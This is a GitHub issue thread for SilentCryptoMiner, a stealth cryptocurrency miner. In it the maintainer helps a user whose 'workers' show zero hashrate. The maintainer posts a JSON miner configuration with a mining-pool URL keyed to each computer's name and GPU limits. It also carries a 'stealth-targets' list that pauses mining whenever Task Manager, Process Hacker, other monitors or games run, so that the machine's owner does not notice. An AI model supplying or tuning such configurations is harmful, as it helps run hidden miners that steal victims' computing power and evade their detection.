### ISSUE TITLE
0 hashrate

### ISSUE THREAD

**Issue by doniblya** [UnamSanctam/SilentCryptoMiner#687]
all video cards are suitable for etc 
![image](https://user-images.githubusercontent.com/103229078/166146262-6c84ff40-01b8-43b9-a623-a83daef61dde.png)
and no one is mining but it shows that they are on idle

**Comment by UnamSanctam** [comment]
Press the '+' next to the miner ID and take a screenshot, that doesn't really say much.

**Comment by doniblya** [comment]
> Press the '+' next to the miner ID and take a screenshot, that screenshot doesn't really say much of what could be wrong.

![image](https://user-images.githubusercontent.com/103229078/166146605-1cc88ce7-2641-4e0a-b1e3-b4938ba2ae51.png)

**Comment by UnamSanctam** [comment]
Can you try changing "Default ethminer" inside "Configurations" to:
```
{
    "url": "stratums://`WALLET`.{COMPUTERNAME}@etc.2miners.com:11010",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": ""
}
```
And see what happens? Replace WALLET with your own wallet address. You can also change whatever other settings you want.

**Comment by UnamSanctam** [comment]
There's also a new web panel update and miner update out so you know

**Comment by doniblya** [comment]
> Can you try changing "Default ethminer" inside "Configurations" to:
> 
> ```
> {
>     "url": "stratums://`WALLET`.{COMPUTERNAME}@etc.2miners.com:11010",
>     "algo": "etchash",
>     "max-gpu": 50,
>     "idle-wait": 5,
>     "idle-gpu": 100,
>     "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
>     "kill-targets": ""
> }
> ```
> 
> And see what happens? Replace WALLET with your own wallet address. You can also change whatever other settings you want.

it worked lol, the problem was in kill targets, ty

**Comment by doniblya** [comment]
p.s. still same issue, only mining 2 workers, others not

**Comment by UnamSanctam** [comment]
Try removing the configuration after it's been applied (change it to `{}`). Send a screenshot of one that's not mining.

**Comment by doniblya** [comment]
still same, in older versions there were no such problems :(

**Comment by UnamSanctam** [comment]
With the new version as well? There aren't really any differences in mining compared to the old versions.
